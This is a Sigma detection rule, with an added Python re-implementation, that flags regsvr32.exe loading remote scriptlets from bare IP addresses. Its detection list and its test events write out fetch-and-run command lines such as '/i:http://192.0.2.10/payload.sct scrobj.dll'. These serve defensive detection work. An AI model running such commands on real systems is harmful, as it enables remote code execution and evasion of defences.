Potentially Suspicious Regsvr32 HTTP IP Pattern
Detects regsvr32.exe (matched by image path or by original file name, so renamed copies are covered) being run with a /i: or -i: argument that points to an http(s) URL whose host begins with a digit, i.e. a remote DLL or scriptlet fetched from a bare IP address rather than a hostname.
Sigma rule
title: Potentially Suspicious Regsvr32 HTTP IP Pattern
id: 2dd2c217-bf68-437a-b57c-fe9fd01d5de8
status: test
description: Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.
references:
    - https://twitter.com/mrd0x/status/1461041276514623491
    - https://twitter.com/tccontre18/status/1480950986650832903
    - https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
author: Florian Roth (Nextron Systems)
date: 2022-01-11
modified: 2023-05-24
tags:
    - attack.defense-evasion
    - attack.t1218.010
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\regsvr32.exe'
        - OriginalFileName: 'REGSVR32.EXE'
    selection_ip:
        CommandLine|contains:
            - ' /i:http://1'
            - ' /i:http://2'
            - ' /i:http://3'
            - ' /i:http://4'
            - ' /i:http://5'
            - ' /i:http://6'
            - ' /i:http://7'
            - ' /i:http://8'
            - ' /i:http://9'
            - ' /i:https://1'
            - ' /i:https://2'
            - ' /i:https://3'
            - ' /i:https://4'
            - ' /i:https://5'
            - ' /i:https://6'
            - ' /i:https://7'
            - ' /i:https://8'
            - ' /i:https://9'
            - ' -i:http://1'
            - ' -i:http://2'
            - ' -i:http://3'
            - ' -i:http://4'
            - ' -i:http://5'
            - ' -i:http://6'
            - ' -i:http://7'
            - ' -i:http://8'
            - ' -i:http://9'
            - ' -i:https://1'
            - ' -i:https://2'
            - ' -i:https://3'
            - ' -i:https://4'
            - ' -i:https://5'
            - ' -i:https://6'
            - ' -i:https://7'
            - ' -i:https://8'
            - ' -i:https://9'
    condition: all of selection_*
falsepositives:
    - FQDNs that start with a number such as "7-Zip"
level: high
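To make the rule's behaviour concrete, here is an added example that is not part of the SigmaHQ rule or of this page: a plain-Python re-implementation of the two selections and the `all of selection_*` condition, run over a handful of constructed process_creation events (the IP addresses are from documentation ranges and the command lines are made up). It reproduces the documented false positive (a host such as 7-zip.org starts with a digit) and shows one gap of pure substring matching (a URL quoted as `/i:"http://..."` does not contain `' /i:http://1'`). The `strict_matches` function is my own stricter variant, not the rule: it extracts the `/i:` URL with a regex I wrote for this example and checks the host with Python's `ipaddress` module.

```python
"""Re-implementation of the Sigma rule's logic plus a stricter variant.

Added example; not SigmaHQ code. Sigma string modifiers (contains,
endswith, plain equality) are case-insensitive, so every comparison
below is done on lower-cased values.
"""
import ipaddress
import re

# The rule's selection_ip list, generated the way the YAML spells it out:
# " /i:" or " -i:", then http:// or https://, then a digit 1-9 (36 entries).
SELECTION_IP = [
    f" {flag}:{scheme}://{digit}"
    for flag in ("/i", "-i")
    for scheme in ("http", "https")
    for digit in "123456789"
]


def selection_img(event: dict) -> bool:
    """Image|endswith '\\regsvr32.exe' OR OriginalFileName == 'REGSVR32.EXE'."""
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "").lower()
    return image.endswith("\\regsvr32.exe") or original == "regsvr32.exe"


def selection_ip(event: dict) -> bool:
    """CommandLine|contains any of SELECTION_IP."""
    cmdline = event.get("CommandLine", "").lower()
    return any(needle in cmdline for needle in SELECTION_IP)


def rule_matches(event: dict) -> bool:
    """condition: all of selection_*"""
    return selection_img(event) and selection_ip(event)


# Stricter variant (assumption of this example, not the rule): locate the
# /i: or -i: URL, tolerate an optional opening quote, and keep the host part.
_INSTALL_URL = re.compile(r'[/-]i:"?https?://([^/\s"]+)', re.IGNORECASE)


def remote_install_host(cmdline: str):
    """Return the host of the /i: URL, or None if there is no such URL."""
    m = _INSTALL_URL.search(cmdline)
    if not m:
        return None
    host = m.group(1)
    if host.startswith("["):                # bracketed IPv6 literal, maybe :port
        return host[1:host.index("]")] if "]" in host else None
    if host.count(":") == 1:                # IPv4 or hostname with :port
        host = host.split(":", 1)[0]
    return host


def strict_matches(event: dict) -> bool:
    """regsvr32 image AND the /i: host parses as an IP address."""
    if not selection_img(event):
        return False
    host = remote_install_host(event.get("CommandLine", ""))
    if host is None:
        return False
    try:
        ipaddress.ip_address(host)
    except ValueError:                      # a hostname such as 7-zip.org
        return False
    return True


# Constructed sample events, not real telemetry.
EVENTS = [
    {"id": "tp_ip", "Image": "C:\\Windows\\System32\\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://192.0.2.10/payload.sct scrobj.dll"},
    {"id": "tp_renamed", "Image": "C:\\Users\\Public\\svc.exe", "OriginalFileName": "REGSVR32.EXE",
     "CommandLine": "svc.exe /s /n /u -i:https://198.51.100.7/a.sct scrobj.dll"},
    {"id": "fp_7zip", "Image": "C:\\Windows\\System32\\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /i:http://7-zip.org/x.sct foo.dll"},
    {"id": "quoted_url", "Image": "C:\\Windows\\System32\\regsvr32.exe",
     "CommandLine": 'regsvr32.exe /s /n /u /i:"http://192.0.2.10/payload.sct" scrobj.dll'},
    {"id": "hostname", "Image": "C:\\Windows\\System32\\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://example.com/x.sct scrobj.dll"},
    {"id": "local_dll", "Image": "C:\\Windows\\System32\\regsvr32.exe",
     "CommandLine": 'regsvr32.exe /s "C:\\Program Files\\Foo\\bar.dll"'},
    {"id": "other_image", "Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe /i:http://192.0.2.10/x.dll,Run"},
]


def evaluate(events):
    """Map event id -> (rule verdict, strict verdict)."""
    return {e["id"]: (rule_matches(e), strict_matches(e)) for e in events}


if __name__ == "__main__":
    for event_id, (rule, strict) in evaluate(EVENTS).items():
        print(f"{event_id:12} rule={rule!s:5} strict={strict}")
```

The stricter variant trades one blind spot for another: it drops the 7-zip.org style false positive and catches the quoted URL, but it would also accept a bare hostname the rule would flag if someone later relaxed the digit check, so it is a complement to the rule rather than a replacement.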
Related rules
- DNS Query Request By Regsvr32.EXE
- HTML Help HH.EXE Suspicious Child Process
- Network Connection Initiated By Regsvr32.EXE
- Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32
- Potential EmpireMonkey Activity